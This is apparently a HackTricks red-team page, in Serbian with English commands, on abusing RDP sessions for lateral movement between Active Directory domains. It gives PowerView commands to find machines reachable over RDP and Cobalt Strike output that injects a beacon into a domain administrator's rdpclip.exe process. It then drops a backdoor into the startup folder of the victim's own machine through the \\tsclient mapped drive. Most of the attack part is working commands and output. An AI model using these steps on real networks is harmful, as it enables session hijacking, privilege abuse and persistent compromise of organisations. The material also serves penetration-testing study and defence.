RDP Sessions Abuse
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RDP Process Injection
Ako spoljašnja grupa ima RDP pristup bilo kojem računaru u trenutnom domenu, napadač bi mogao kompromitovati taj računar i čekati ga.
Kada taj korisnik pristupi putem RDP-a, napadač može preći na sesiju tog korisnika i zloupotrebiti njegove dozvole u spoljašnjem domenu.
# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
4960 1012 rdpclip.exe x64 3 EXT\super.admin
beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user
Proverite druge načine za krađu sesija sa drugim alatima na ovoj stranici.
Ako korisnik pristupi RDP-u na mašini gde napadač čeka na njega, napadač će moći da ubaci beacon u RDP sesiju korisnika i ako je žrtva montirala svoj disk prilikom pristupa putem RDP-a, napadač bi mogao da mu pristupi.
U ovom slučaju, mogli biste samo da kompromitujete originalni računar žrtve tako što ćete napisati backdoor u startup folder.
# Wait til someone logs in:
net logons
Logged on users at \\localhost:
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
4960 1012 rdpclip.exe x64 3 EXT\super.admin
beacon> inject 4960 x64 tcp-local
# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c
Size Type Last Modified Name
---- ---- ------------- ----
dir 02/10/2021 04:11:30 $Recycle.Bin
dir 02/10/2021 03:23:44 Boot
dir 02/20/2021 10:15:23 Config.Msi
dir 10/18/2016 01:59:39 Documents and Settings
# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
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